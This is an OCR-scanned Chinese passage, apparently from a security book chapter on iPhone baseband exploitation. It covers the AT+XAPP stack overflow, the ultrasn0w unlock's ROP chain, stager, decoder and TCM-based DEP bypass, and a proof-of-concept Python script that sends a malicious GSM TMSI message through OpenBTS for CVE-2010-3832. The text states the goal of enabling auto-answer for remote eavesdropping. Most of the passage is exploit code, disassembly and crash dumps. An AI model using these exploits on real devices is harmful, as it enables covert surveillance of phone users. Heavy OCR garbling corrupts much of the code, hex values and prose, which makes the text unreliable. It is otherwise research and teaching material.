X-Gold 608 基 带 , 以 及 01.59.00 版 的 X-Gold 61x 系 列 基 带 也 存在 该 漏洞 。@sherif hashim、@Oranav、 
(@westbaer 和 geohot 通 过 测试 AT 命 令 寻 找 骨 演 各 自 独立 发 现 了 该 漏洞 。 

在 研究 远程 漏洞 之 前 , 最 好 是 先 实现 很 容易 利用 的 本 地 内 存 损坏 。 下 面 的 例子 展示 了 在 使 用 
了 04.05.04_G 版 本 ICE 基 带 的 iPhone 2G 上 概念 验证 触发 器 的 效果 : 


# ./sendmodem 'AT+XAPP="######## 打 ## 提 六 # 宁 提 提 扩 提 划 扩 提 # 扩 提 失禁 井 守 打 井 宁 提 ## 六 提 # 间 ##4444555566667777 
PPPP™" 
Sending command to modem: AT 





























OK 

Sending command to modem: 

AT+XAPP=" 非 间 ## 提 打 提 打 提 划 扩 提 划 扩 提 提 扩 井 失禁 井 守 打 井 宁 打 井 宁 提 划 扩 井 ## 提 ####4444555566667777PPPP" 
一 .十 

# ./sendmodem 'AT+XLOG' 

Sending command to modem: AT 

一 .十 

AT 
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OK 
Sending command to modem: AT+XLOG 


AT+XLOG 
+XGENDATA: "DEV_ICE MODEM 04.05.04_G 




















+XLOG: Exception Number: 1 
Trap Class: OxBBBB (HW PREFETCH ABORT TRAP) 
System Stack: 

OxA0086800 

[176 DWORDs omitted] 

0x00000000 
Date: 15.01.2012 
Time: 05:47 
Register: 
E00: 0x00000000 EE 0x00000000 E22 OXxFFFF231C 
Es OxBO101FF9 r4: 0x34343434 5 0x35353535 
区 63 0x36363636 下 0x37373737 Es 0x00000000 
EQ OxA00028E4 r10: 0xB00AC938 xz11: 0xB00B67CC 
r12: OxA0114F95 r13: 0xB0OO0B2CF4 r14: 0xA010E97D 
xz15: 0x50505054 
SPSR: 0x40000013 DFAR: 0x00000001 DFSR: 0x00000005 

















注意 ”这 个 例子 使 用 sendmodem ( http://code.google.com/p/iphone-elite/wiki/sendmodem ) 与 基带 
通信 。 如 果 想 要 获得 与 GSM 版 iPhone 4 上 的 AT 命令 解析 器 进行 通信 的 接口 ， 你 就 要 用 到 
/dev/dlci.spi-baseband.extra 0，, 而 非 /dev/tty .debug。 


正如 大 家 所 见 ， 这 种 栈 缓冲 区 溢出 可 用 来 设置 >4~z*7 寄 存 器 以 及 程序 计数 器 。 利 用 该 溢出 漏 
洞 ， 我 们 很 容易 把 自己 的 代码 注入 到 基带 中 。 


11.5.2 ultrasnow 解 锁 工 具 


这 里 探讨 ultrasnow 解 锁 工 具 怎 样 利 用 AT+XAPP 游 出 规避 iPhone 4 上 的 网 络 锁 。 

首先 ， 大 家 必须 理解 ultrasn0w 工 具 包 的 工作 流程 。 该 解锁 工具 会 向 使 用 MobileSubstrate 框 
架 的 commcentet 进 程 注入 一 个 动态 库 。 在 检查 过 自己 是 与 所 支持 的 基带 软件 版 本 进行 通信 后 
该 动态 库 会 向 基带 处 理 器 发 送 一 系列 的 AT 命令 ， 对 Ar+XxaPP 溢 出 漏洞 进行 攻击 并 那里 留 下 一 系 

列 有 效 载荷 。 最 后 的 目标 是 拦截 并 修改 由 SEC 线程 ( func_sec_process ) 收发 的 消息 ， 从 而 向 

过 程 的 其 余部 分 伪造 已 解锁 状态 。 在 之 前 针对 X-Gold 608 芯 片 组 的 ultrasn0w 工 
具 中 ， 这 一 目标 是 通过 创建 单独 的 Nucleus 任 务 ， 拦 截 并 替换 邮箱 消息 达到 的 。 针 对 iPhone 4 的 
ee 解锁 过 程 会 重 写 ThreadX 中 负责 SEC 进程 间 通 信 的 部 分 代码 。 
本 节 要 介绍 的 就 是 实现 这 一 目标 所 利用 的 手段 ， 而 支持 iPhone 4 的 最 新 版 ultrasn0w 是 本 书写 作 
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之 时 最 复杂 的 解锁 工具 ， 极 其 精妙 。 

如 果 在 安装 ultrasn0w 之 后 反 汇 编 /Library/MobileSubstrate/DynamicLibraries 目 录 中 的 
ultrasn0w.dylip 动 态 对 象 ， 你 就 会 看 到 一 个 由 指向 unlock_strings 字 符 串 的 指针 组 成 的 指 
针 数 组 ， 而 该 指针 数组 指向 在 基带 处 理 咒 上 利用 了 ar+XaPP 溢 出 的 4 个 不 同 实例 。 痢 析 这 些 ， 大 
家 将 能 够 揭 开 解锁 工具 的 面纱 ， 领 略 它 的 复杂 度 。 

下 面 是 初始 的 代码 注入 。 已 经 在 所 发 送 的 第 一 个 解锁 字符 串 中 ,大 家 可 能 注意 到 一 些 出 乎 意 
料 的 事 ， 代 码 不 是 被 直接 注入 的 ， 而 是 利用 由 一 个 指令 片段 ( 0x6014A0F1 ) 构成 的 ROP 链 在 非 
常 高 端的 内 存 凝 聚 一 段 代 码 。 




















0x00000000 DCD 0x34343434 ; R4 [unused] 

0x00000004 DED' 0x35353535 ; R5 [unused] 

0x00000008 DCD 0x36363636 ; R6 [unused] 

0x0000000C DCD 0x37373737 ; R7 [unused] 

0x00000010 DCD 0x6014A0F3 ; POP {R3-R5}, PC 

0x00000014 DCD 'UUUU ' ; R3 [unused] 

0x00000018 DCD 0x47804807 ; R4 [code/datal 

0x0000001C DCD OxFFFF1FDO ; R5 [address] 

0x00000020 DCD Ox6014A0F1 ; STR R4，[R5] 

0x00000020 ; POP {R3-R5}, PC 

0x00000024 DCD 'UUUU ' ; R3 [unused] 

0x00000028 DCD OxBCOF1C07 ; R4 [code/datal 

0x0000002C DCD OxFFFF1FD4 ; R5 [address] 

0x00000030 DCD Ox6014A0F1 ; STR R4, [R5] 

0x00000030 ; POP {R3-R5}, PC 

[eal 

0x000000B4 DCD 'UUUU ; R3 [unused] 

0x000000B8 DCD 0x601FD9FC ; R4 [code/datal 

0x000000BC DCD OxFFFF1FF8 ; R5 [address] 

0x000000C0 DCD Ox6014A0F1 ; STR R4, [RS5] 

0x000000C0 ; POP {R3-R5}, PC 

0x000000C4 了 ED 33335 ; R3 [unused 

0x000000C8 DCD '4444' ; R4 [unused 

0x000000CC DCD '5555 ; R5 [unused 

0x000000D0 DCD OxFFFF1FD1 ; entry point 

0x000000D4 DCD OxFFFFO04D0O ; [2nd stage] RO (memcpy dst) 
0x000000D8 DCD 0x6087A7BC ; [2ngd stage] R1 (memcpy src) 
0x000000DC DCD 0xL1010159 ; [2ngd stage] R2 (lst summand of len) 
0x000000E0 DCD OXxFEFEFEFF [2ngd stage] R3 (2nd summand of len) 




















每 一 次 对 该 ROP 指 令 片段 的 调用 都 会 从 栈 中 消耗 掉 放 在 +3 5 寄存 器 以 及 PC 寄存 器 中 的 4 个 
参数 。 在 写 了 11 个 字 之 后 ， 执 行 流 就 会 被 重 定向 到 创建 的 Thumb 代 码 。 反 汇编 形式 如 下 所 示 : 














OxFFFF1FDO CODE16 
OxFFFF1FDO 07 48 LDR RO0, =0x6018135C 
OXFFFF1FD2 80 47 BLX RO ; Call disable_ ints 
OxFFFF1FD4 07 1C MOVS R7, RU 

; preserve CPSR 
OxFFFF1FD6 0F BC POP {RO-R3}\; get args for memcpy 
OxFFFF1FD8 D2 18 ADDS R2, R2, R3 ; fix up length 
OxFFFF1FDA 07 4B LDR R3, =0x601FD9FC 
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OxFFFF1FDC 98 47 BLX R3; call memcpy 

OxFFFF1FDE 38 1C MOVS RO, R7; get preserved CPSR 

OXFFFF1FEO 04 49 LDR R1, =0x6018136C 

OxFFFF1FE2 88 47 BLX R1 ; call restore_ cpsr 

OXxFFFF1FE4 01 49 LDR R1,;, =0x72883C6C ; for clean,. 

OXFFFF1FE6 8D 46 MOV SP, R1; continuation 

OxFFFF1FE8 48 1A SUBS RO, R1, R1; clear RO 

OxFFFF1FEA FO BD POP {R4-R7,PC} ; no crash, please 

OxFFFF1FEA A 

OXFFFF1FEC 6C 3C 88 72 new_sp DCD Ox72883C6C; DATA XREF: OxFFFF1FE4 

OxFFFF1FFO 5C 13 18 60 P_ disable ints DCD 0x6018135C; DATA XREF: OxFFFF1FDO 

OXxFFFF1FF4 6C 13 18 60 P_restore cpsr DCD 0x6018136C; DATA XREF: OxFFFF1FEO 

OxFFFF1FF8 FC D9 1F 60 P_ memcpy DCD 0x601FD9FC; DATA XREF: OxFFFF1FDA 

这 段 代 码 是 个 stager 例 程 ， 它 把 剩 下 的 解锁 字符 串 中 的 代码 复制 到 内 存 顶 端的 区 域 中 。 
代码 位 于 0xFFFF04D0 位 置 ， 且 反 汇 编 形式 如 下 : 

OxFFFFO4D0 detour_ OxFFFFO04D0 ; detour to ROM 

OxFFFFO04D0 LDR PC, =0x40736334 

OxFFFFO04D0 ; -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 

OxFFFFO4D4 CODE16 

OxFFFFO0O4D4 org_OxFFFFO04D0 DCD 0x40736334 ; DATA XREF: detour_ 0xFFFF0O4D0 

OxFFFFO04D8 ; -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 

0xFFFF04D8 

OxFFFFO04D8 decoder_entry 

0xFFFF04D8 LDR RO, =0x60FAO11F 

OxFFFFO4DA SUBS RO, #0x80 ; avoid 0 bytes 

OxFFFFO4DC SUBS RO, #0x80 ; RO = Ox60FAOO01F 

OxFFFFO4DE LDR R2, =0x60701280 

OxFFFFO4E0 STR RO, [R2] 

OxFFFFO0O4E2 ADDS R4, R4, R7 

OxFFFFO4E4 LDR RO, =0x6018135C 

OXxFFFFO4E6 BLX RO ; Call disable ints 

OxFFFFO0O4E8 MOVS R7, RO 

OxFFFFO4A4EA ADDS R2; RS, Ré6 

OxFFFFO4E MOVS 要 和 茂生 二 这 

OxFFFFO4F0O 

OxFFFFO4F0 decoder_loop ; CODE XREF: OxFFFFOS5O08 

OxFFFFO4F0O LDRB RO, [R4] 

OxFFFFO4F2 CMP RO, RS5 ; Check for end of str 

OxFFFFO4F4 BEQ break_loop 

OxFFFFO4F6 NOP 

OxFFFFO4F8 CMP RO, #0xFF ; escape character 

OxFFFFO4FA BNE non_escaped 

OxFFFFO4FC ADDS R4， 1 ; Skip OXFF 

OxFFFFO4FE LDRB RO , R41] 

OxFFFFO500 ADDS RO, 1 

0xFFFFO0OS5O02 

OxFFFFO0502 non_ escaped ; CODE XREF: OxFFFFO4FA 

0xFFFFOS5O02 STRB RO, R21] 

OxFFFFOS5O04 ADDS R4， 1 

OxFFFFO506 ADDS R2, 时 

OxFFFFO508 B decoder_loop 

OxFFFFOS5OA ; -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
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OxFFFFOSOA 

OxFFFFOS5OA break_ loop ; CODE XREF: OxFFFFO4F4 
OxFFFFOS5OA MOVS RO “RY7 

OxFFFFOS5OC LDR R1, =0x6018136C 

OxFFFFOSOE BLX R1 ; Call restore_ cpsr 
0xFFFFOS510 SUBS RO RL RL 

0xFFFFOS512 MOV R27 SP 

OxFFFFOS514 LDR R2, [R2] 

OxFFFFOS516 BX R2 

OXFFFFO0516 ; ------------------------------------------------------------------- 
0xFFFFOS518 aioiaa FFFFOS518 DCD Ox60FAO11F ; DATA XREF: decoder_ entry 
OxFFFFOS51C dword_ FFFFOS1C DCD 0x60701280 ; DATA XREF: OxFFFFO4DE 
OxFFFFO0520 P_disable ints DCD 0x6018135C ; DATA XREF: OxFFFFO4E4 
OxFFFFO524 P_restore cpsr DCD 0x6018136C DATA XREF: OXxFFFFOSOC 





因为 在 由 上 述 代码 重 写 过 的 地 址 存 ee 所 以 第 一 条 指令 是 迁 回 到 闪存 
中 已 重 写 函 数 。 从 0xFFFF04D8 起 的 代码 是 个 简单 的 解码 函数 ， 被 随后 的 AT+XAPP 溢 出 实例 用 来 
允许 执行 任意 有 效 载 荷 。 如 果 大 家 想 要 注入 二 进 制 BLOB ， 那 么 这 个 简单 的 解码 器 是 必需 的 ， 
为 传递 给 AT+XAPP 的 字符 串 中 不 能 出 现 空格 和 0 字 节 这 样 的 特殊 字 节 。 该 解码 器 将 r5+r6 用 作 已 
解码 有 效 载 答 对 应 的 目的 地 址 ， 并 将 r4+r7 用 作 解 码 器 输入 对 应 的 源 地 址 。 它 的 工作 机 制 是 一 直 
复制 字符 直到 遇 到 引号 字符 ( 0x22 )， 并 将 0xff 作 为 转 义 符 。 如 果 在 输入 中 发 现 0xff， 它 之 后 
的 那个 字 节 要 递增 1 ( 模 256 )， 并 复制 到 输出 中 一 一 丢弃 该 转 义 符 。 

这 种 方法 会 带 来 两 个 问题 ， 为 什么 注入 解码 器 需要 用 到 ROP 链 ， 还 有 就 是 stager 程 序 和 解码 
器 被 复制 到 的 内 存 空 间 有 何 特别 之 处 ? 

X-Gold 61x 系 列 基带 引入 了 一 项 新 的 安全 功能 ， 即 严格 形式 的 DEP ( Data Execution 
1 数据 执行 保护 )。 所 有 的 可 写 内 存 区 域 都 缺少 执行 标志 。 此 外 ， 内 存在 早期 初始 化 阶 

会 被 标记 为 可 执行 ， 而 在 这 一 阶段 过 后 页 面 权限 就 会 被 锁定 。 在 这 一 初始 化 阶段 完成 之 后 , 好 
办 法 能 在 可 写 页 上 设置 执行 标志 。 

另 一 方面 , 大 家 可 以 看 到 上 述 有 效 载荷 的 本 地 代码 ， 而 不 只 是 ROP 链 的 代码 。 这 是 怎么 做 到 
的 呢 ? 事实 证 明 ， 这 道 看 似 固 若 金汤 的 DEP 防 线 还 是 存在 明显 的 鲜 除 。ARM CPU 可 以 具有 称 为 
TCM ( Tightly Coupled Memory ， 紧 耦合 存储 器 ) 的 第 一 级 缓存 。 而 X-Gold 61x 系 列 基带 中 的 
ARM1176 核 心 具有 在 初始 化 时 被 启用 的 TCM。 





















































0x40100054 MOV RO, #0 ; TCM bank 0 
0x40100058 MCR pl5, 0, RO0,c9,c2, 0 ; write TCM selection register 
0x4010005C NOP 
0x40100060 MOV RO, #1 ; "1 = I/D TCM Region Register accessible in 
; Secure and Non-secure worlds." 
Ox40100064 MCR pl5, 0, RO,c9,c1, 2 ; write DTCM non-secure control access 
; register 
0x40100068 NOP 
Ox4010006C MCR pl5, 0, RO,c9,c1, 3 ; write ITCM non-secure control access 
; register 
0x40100070 NOP 
0x40100074 LDR R1, =0xFFFFO00D ; enable ITCM with base address OxFFFFO000 
0x40100078 MCR pl5, 0, Ri1,c9,c1, 1 ; write ITCM region register 
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0x4010007C NOP 
0x40100080 LDR R1, =0xFFFF200D ; enable DTCM with base address OxFFFF2000 
0x40100084 MCR pl5, 0, R1,c9,c1, 0 ; write DTCM region register 
0x40100088 NOP 
0x40100088 ========================== 
0x4010008C MOV RO, #1 ; TCM bank 1 
0x40100090 MCR pl5, 0, RO,c9,c2, 0 ; write TCM selection register 
0x40100094 NOP 
0x40100098 MOV RO, #1 ; "1 = I/D TCM Region Register accessible in 
; Secure and Non-secure worlds." 
0x4010009C MCR pl5, 0, RO,c9,c1, 2 ; write DTCM non-secure Control access 
register 
0x401000A0 NOP 
Ox401000A4 MCR pl5, 0, RO,c9,c1, 3 ; write ITCM non-secure control access 
register 
0x401000A8 NOP 
0x401000AC LDR R1, =0xFFFF100D 
0x401000B0 MCR pl5, 0, R1,c9,c1, 1 ; write ITCM region register 
0x401000B4 NOP 
0x401000B8 LDR R1, =0xFFFF300D 
0x401000BC MCR pl5, 0, Ri1,c9,c1, 0 ; write DTCM region register 
0x401000C0 NOP 
Ox401000C4 BX LR 
这 就 解释 了 为 什么 漏洞 攻击 程序 可 以 往 0xFFFF0000 以 上 的 地 址 写 和 数据， 并 能 让 CPU 把 写 
和 人 的 数据 当做 代码 执行 。 
要 理解 发 送 的 第 二 个 和 第 三 个 T+XAPP 字 符 串 , 你 先 要 理解 最 后 一 个 。 我们 不 会 完整 地 给 出 
最 后 一 个 解锁 字符 串 中 包含 的 有 效 载荷 ， 而 只 是 快速 了 解 一 下 它 的 关键 部 分 : 












































OxFFFFOA30 LDR R4, =0x601FD9FC ; memcpy 
OxFFFFOA32 LDR R5, =0x60FA0000 ; void *ptr = 0x60FA0O000 
OxFFFFOA34 LDR R6, =0xFFFF1000 
OxFFFFOA36 
OxFFFFOA36 tcm patch _ loop ; CODE XREF: Sub_FFFFO9A8+A2 
OxFFFFOA36 LDRH RO [R51] dst Offset = *( (uintl6. tw“) ‘PER) 
OxFFFFOA38 LDRH R2, [R5,#2] ; len = *((uint16 t *) ptr + 2) 
OxFFFFOA3A MOVS R7, R2 
OxFFFFOA3C CMP R2, #0 ; if (len == 0) 
OxFFFFOA3E BEQ tcm pl_exit ; { goto tcm pl_ exit; } 
OxFFFFOA40 ADDS R5, 4 ; ptr += 4 
OxFFFFOA42 MOVS R1, RS5 
OxFFFFOA44 ADDS RO, RO, R6 ; dst = OxFFFF1000 + dst_offset 
OxFFFFOA46 BLX RA ; memcpy (OxFFFF1000 + dst_offset, 

; ptr, len) 
OxFFFFOA48 ADDS R5, R5, R7 ; ptr += len 
OxFFFFOA4A B tcm patch_ loop 
OXFFFFOA4C ; -------------------------------------------------------- 
OxFFFFOA4C 
OXxFFFFOA4C tcm pl_ exit ; CODE XREF: Sub_FFFFO9A8+96 
OxFFFFOA4C LDR RO, =0xFFFFOF78 
OxFFFFOA4E ADR R1, sub_FFFFOBS54 
OxFFFFOASO MOVS R2, #0xC 
OxFFFFOAS2 BLX R4 
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OxFFFFOAS4 BL sub_FFFFOA74 

0xFFFFOAS8 POP {R4-R7} 

OxFFFFOASA MOVS RO, #0 

OxFFFFOASC LDR R3, =0x60186E5D ; stack cleanup (SP+=0x1C) 
OxFFFFOASDE BX R3 














第 二 个 和 第 三 个 AT+XAPP 字 符 串 会 把 内 存 区 域 链表 存储 到 TCM, 在 地 址 为 0x60FA0000 的 
内 存 打 上 补丁 。 该 链表 是 由 上 述 代 码 遍 历 的 ， 而且 它 的 格式 很 简单 : 表 中 的 每 个 数据 项 都 有 一 
个 头 部 ， 由 相对 于 0xFFFF1000 的 16 位 偏 移 量 字 段 和 指定 其 不 含 头 部 之 长 度 的 16 位 长 度 字 段 组 
成 。 而 该 链表 的 结尾 是 一 个 长 度 字段 为 0 的 数据 项 。 下 面 的 IDAPython 脚 本 模拟 了 上 述 本 地 代码 
的 行为 : 


from idc import * 

















ea = 0x60FA0000 
dst = OxFFFF1000 
while True: 
n = Word(ea+2) 
offset = Word(ea) 
说 E 阁 
break 
print "patching %d bytes at Ox%08x." %$ (n, dst + offset) 
ea += 4 
for i in range(n): 
PatchByte(dst+offset+i, Byte(ea+i)) 
SetColor (dst+offset+i, CIC_ ITEM, OxFFFFO0O0) 
ea += n 


请 使 用 Load Additional Binary File ( 载 人 额外 的 二 进 制 文件 ) 功能 载 入 解码 的 文件 ， 串 接 位 
于 地 址 0x60FA0000 的 第 二 个 和 第 三 个 解锁 字符 串 的 有 效 载 荷 ， 放 到 该 栈 既 有 的 IDA Pro 数 据 库 
中 ， 然 后 运行 上 述 脚本 。 

而 最 后 一 个 解锁 字符 串 中 包含 的 有 效 载荷 也 有 我 们 感 兴趣 的 地 方 ， 就 是 下 面 这 两 个 用 C 语 言 
表示 的 两 个 函数 : 

/* OxFFFFOAB2 */ 


int replace addrs_ on stack(uint32 t *start, uint32_t *end, uint32_t match20msb, 
uint32_t replace_ base) 














{ 
while ( start < end ) 
{ 
/* 这 会 把 指向 栈 中 TCM 区 域 的 每 一 个 地 址 重新 映射 到 
与 其 对 等 的 闪存 中 。 真 的 ， 哇 哦 */ 


if ( *start >> 12 == match20msb >> 12 ) 
*start = (*start & OxFFF) + replace base; 
a 


} 
} 


/* OxXFFFFO7TAE */ 
void replace addrs_ on all_ stacks(void *match20msb, void *replace base) { 
thread ptr = tx thread created ptr; /* [R4] */ 
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/* 并 存储 在 [SP] 中 
* tx_thread_createqd_count 在 R7 中 
* thread_ptr 在 R4 中 
类 沙 
for(i = 0; i < tx _ thread_createdq_count; i++) { 
replace_addrs_on stack(thread ptr->tx_ thread stack_ start, 
thread_ ptr->tx_ thread_ stack_eng, 
match20msb, replace_ base) 
thread_ ptr = thread ptr->next; 














} 
} 


replace_adqdrs_on_ all_stacks 困 数 的 作用 是 纠正 各 线程 的 栈 中 所 有 返回 地 址 的 地 址 。 
每 一 个 指向 TCM 的 返回 地 址 都 会 被 重新 写 到 闪存 中 的 地 址 ， 被 分 散 载 人 器 复制 到 TCM 中 的 代码 
就 来 自 这 些 内 存 位 置 。 

如 果 大 家 选择 为 让 hone4 开 发 一 种 远程 漏洞 攻击 程序 ， 那 么 从 ultrasnow 了 解 到 的 这 些 知识 
将 会 起 到 很 大 的 帮助 作用 。 














11.5.3 ”空中 接口 可 利用 的 溢出 


本 节 要 分 析 CVE-2010-3832 漏 洞 ， 并 给 出 一 个 针对 它 的 概念 验证 漏洞 攻击 程序 。 这 个 漏洞 是 
由 缓冲 区 的 内 存 损坏 造成 的 ， 原因 是 未 检查 与 移动 性 管理 有 关 的 LOCATION UPDATING REQUEST 
(位 置 更 新 请 求 ) 和 TMSI REALLOCATION COMMAND (TMSI 再 分 配 命令 ) 这 两 项 功能 中 TMsI 的 
长 度 。 它 会 影响 使 用 4.2 版 之 前 的 OS 的 所 有 设备 上 运行 的 蜂 窜 服务 。 不 需要 用 户 与 设备 进行 任何 
交互 ， 只 要 设备 进入 恶意 基站 的 覆盖 范围 ， 攻 击 者 就 能 对 该 漏洞 进行 攻击 。 

我 们 在 这 里 要 向 大 家 展示 如 何 触 发 该 漏洞 ， 以 及 如 何 利 用 堆 损 坏 获得 对 程序 计数 器 的 控制 
权 。 然 后 ,我 们 会 介绍 如 何 通过 执行 设置 so 寄存 器 的 处 理 程序 启用 iPhone 的 自动 应 答 功 能 。 这 可 
以 让 攻击 者 把 iPhone 变 成 远程 监听 装置 。 

我 们 要 探讨 的 是 运行 iOS 3.1.3 以 及 ICE 04.05.04_G 基 带 固件 的 iPhone 2G 上 存在 的 该 bug。 
在 对 有 关 最 初 是 如 何 发 现 和 利用 该 漏洞 的 零散 记录 进行 提炼 后 ， 我 们 重新 整合 形成 了 这 里 的 
描述 ,之 所 以 选择 iPhone 2G 而 不 是 iPhone 4, 这 出 于 两 个 原因 。 首 先 ,因为 与 Phone 4 相 比 iPhone 
2G 的 代码 库 要 小 得 多 ， 所 以 获取 干净 的 IDB 也 要 快 得 多 。 其 次 ， 对 于 iPhone 4 来 说 ， 这 个 漏洞 
已 经 被 修复 了 ， 而 且 我 们 尚未 得 知 有 什么 方法 能 把 基带 固件 降级 到 有 漏洞 的 版 本 。 与 此 不 同 ， 
不 管 iPhone 2G 使 用 哪个 版 本 的 固件 ， 它 都 是 具有 该 漏洞 的 ， 因 为 引导 装载 程序 没 法 执行 安全 
给 查 。 这 意味 着 大 家 只 要 随便 买 个 二 手 iPhone 2G,， 就 能 利用 已 经 公开 的 漏洞 着 手 基带 破解 了 ， 
而 不 用 担心 买 到 的 iPhone 被 刷 上 了 不 能 攻击 的 基带 固件 , 也 不 怕 无 意 升级 造成 时 间 和 经 济 上 的 
损失 。 

如 果 带 有 长 度 达 到 64 字 节 的 TMSI，TMSI 再 分 配 命令 就 能 触发 该 漏洞 。 图 11-3 展 示 了 触发 该 
漏洞 的 TMSI 再 分 配 命令 中 包含 的 GSM L3 层 消息 ， 是 通过 Wireshark 网 络 分 析 器 显示 的 。 
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图 11-3 ”利用 Wireshark 对 恶意 TMSI 再 分 配 命 令 的 剖析 











注意 ”小 于 64 字 节 的 TMSI 不 会 导致 崩 演 ， 至 少 在 iPhone 2G 上 不 会 。 





很 不 巧 ， 未 经 修改 的 1ipbmich 是 没 法 直接 创建 该 消息 的 。 因 为 在 符合 标准 的 GSM 和 3GPP 协 
议 实 现 中 , 没有 理由 支持 长 度 不 是 4 字 节 的 TMSI。 不 过 , 大 家 可 以 使 用 1ipbmich 创 建 合适 的 消息 ， 
并 修改 TMSI 字 段 及 长 度 。 

首先 启动 OpenBTS ， 将 iPhone 注册 到 自己 设置 的 网 络 ， 并 利用 OpenBTS 的 testcal1 功 能 ; 
手机 的 GSM L3 层 数据 包 交 换 启 用 UDP 通道 : 

OpenBTS> tmsis 


TMSI IMSI IMEI (SV) age used 
Ox4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX 293s 293s 





1 TMSIs in table 
OpenBTS> testcall 262XXXXXXXXXXXX 60 


OpenBTS> calls 
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState= 
Null (2 sec) 


1 transactions in table 
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然后 ， 利 用 下 面 这 个 Python 小 脚本 发 送 该 有 效 载荷 : 
#!/usr/bin/python 


import socket 

import time 

import binascii 

from libmich.formats import * 


TESTCALL_ PORT = 28670 





len = 19 

lai = 42 

hexstr = "051a00f110" 

hexstr += "%02x%02x%02xfc" % (lai>>8, lai&255, (4*len+1)) 

hexstr += ''.join('%02x666666' % (4*i) for i in range (len)) 

print "layer3 message to be sent:", hexstr 

13msg = binascii.unhexlify (hexstr) 

print "libmich interprets this as: ", repr(L3Mobile.parse _L3 (1l3msg)) 


tcsock = socket.socket (socket.AF_INET, socket.SOCK_ DGRAM) 
tcsock.settimeout (1) 








trys 
tcsock.sendto(l3msg, ('127.0.0.1', TESTCALL PORT)) 
reply = tcsock.recv(1024) 
print "reply received: ", repr(L3Mobile.parse L3 (reply)) 


except Socket .timeout : 
print "no reply received. Potential crash?" 


在 执行 该 脚本 之 后 , 用 于 测试 的 手机 很 快 就 没 信号 了 ( 基带 处 理 器 重启 了 )。 结果 是 在 iPhone 
上 留 下 类 似 如 下 内 容 的 崩溃 日 志 ， 大 家 可 以 利用 AT+XLOG 命 令 进行 提取 : 


+XLOG: Exception Number: 1 

Trap Class: OxAAAA (HW DATAABORT TRAP) 

System Stack: 
0x6666661C 
0x66666630 
0x66666644 
0xA027CBFC 
OxA027CCE4 
0x6666665C 
0x0000000A 
0x6666665C 
| 








Date: 14.07.2010 
Time: 04:58 

















Register: 

r0: 0xA027CBFC rl: 0xA027CCE4 2 0x6666665C 
到 3 0x0000000RA r4: 0x6666665C Dy 0xRA027CCE4 
上 6 : 0x00000001 r7: 0xB0016AA4 r8: 0x00000000 
EE9's OxA00028E4 r10: 0xB008E730 xz11: 0xB008FE9C 
r12: 0x45564E54 r13: 0xB008FA8C r14: 0xA0072443 
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1S OxA0026818 
SPSR: 0xA0000033 DFAR: 0x6666666C DFSR: 0x00000005 
再 来 看 看 造成 上 述 异 常 的 代码 : 
ROM:A002680A FF B5 PUSH {RO-R7, LR} 
ROM:A002680C 0D 00 MOVS RS RL 
ROM:A002680E 83 BO0 SUB 总 有 富有 0xC 
ROM:A0026810 10 69 LDR RO, [R2,#0x10] 

; Causes HW DATAABORT TRAP 

ROM:A0026812 14 00 MOVS R4, R2 
ROM:A0026814 0D 9A LDR R2, [SP,#0x30+arg_4] 
ROM:A0026816 0C 99 LDR R1, [SP,#0x30+arg_0] 
ROM:A0026818 FF F7 6D FB BL sub_A0025EF6 
ROM:A002681C AO 69 LDR RO, [R4,#0x18] 
ROM:A002681E 26 00 MOVS R6, R4 


这 段 代 码 位 于 recv_signal () 函数 (不 是 官方 名 称 ， 只 是 我 们 这 么 叫 它 而 已 ) 的 开头 部 分 ， 
有 逾 40 个 任务 要 调用 该 函数 进行 任务 间 通 信 ,， 它 会 从 其 他 任务 接收 信 令 。 在 本 例 中 , 链接 寄存 器 
(r14 ) 是 直接 从 mme:1 task 的 主 函 数 调 用 的 。 此 外 ， 通 过 在 Application_TInitialize() 例 
程 中 查看 内 存 池 的 分 配 情况 , 大 家 可 以 推断 出 这 块 分 区 内 存 是 从 容纳 大 小 为 52 字 节 的 内 存 块 的 内 
存 池 中 分 配 出 来 的 。 

尽管 崩溃 日 志 显示 程序 计数 器 (r15 ) 是 0xA0026818，, 但 是 大 家 可 以 根据 DFAR ( Data Fault 
Address Register， 数 据 故 障 地 址 寄存 器 ) 的 内 容 以 及 其 他 寄存 器 的 转 储 文件 推断 引发 故障 的 指令 








数 的 第 一 个 参数 加 以 控 
函数 的 包装 ， 
误 , 否则 调用 NU_] 











而 它 会 首先 检查 是 否 有 ptr==NUI 





Deallocate Partition(p 
























































是 在 0xA0026810 处 内 存 载 人 寄存 器 的 。 好 极 了 ! 这 表示 可 以 对 传递 给 sub_A0025EF6 (ptr) 函 
吊 了 。 该 函数 的 反 汇 编 显示 这 只 是 NU_Deallocate_Partition(ptr) 
LL。 在 指针 为 NULL 的 情况 下 ， 该 函数 会 记录 下 错 
tr)。 更 细 地 了 解 分 区 内 存 的 实 ] 








岗 ， 你 就 会 发 现 这 


条 路 不 是 那么 好 走 的 。 与 动态 内 存 的 实现 相反 ， 分 区 内 存 不 会 轻易 提供 write4 原 语 ， 因 为 不 需要 
合并 内 存 块 。 这 种 情况 下 也 存在 获得 某 些 寄存 器 的 控制 权 的 其 他 方式 , 但 这 都 是 些 漫长 而 痛苦 的 


过 程 。 




















更 为 简单 的 方式 是 取得 程序 计数 需 的 控制 权 ! 事实 证 明 ， 有 一 种 简便 方法 。 把 TMSI 的 长 度 
增加 4 字 节 ， 这 样 每 次 尝试 时 就 会 多 一 个 被 重 写 的 字 ， 这 样 很 快 就 能 达到 重 写 19 个 字 的 目的 了 : 


+XLOG: 


Trap Class: 





Exception Number: 


0xBBBB 


System Stack: 
OxAOO6FCA4 
0x00000677 
0x00000000 
0x0000000A 
0x00000000 
0x00000000 


0OxB000] 
0xB000] 


Date: 


Time: 21:31 


L7072010 


(HW PR. 


下 
FEF] 








ETCH ABORT TRAP) 





E720 
E788 
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Register: 

r0: Ox00000000 rl: 0x60000013  r2: 0xFFFF231C 

r3: 0x00000000  r4: 0x6666665C  r5: 0x66666660 

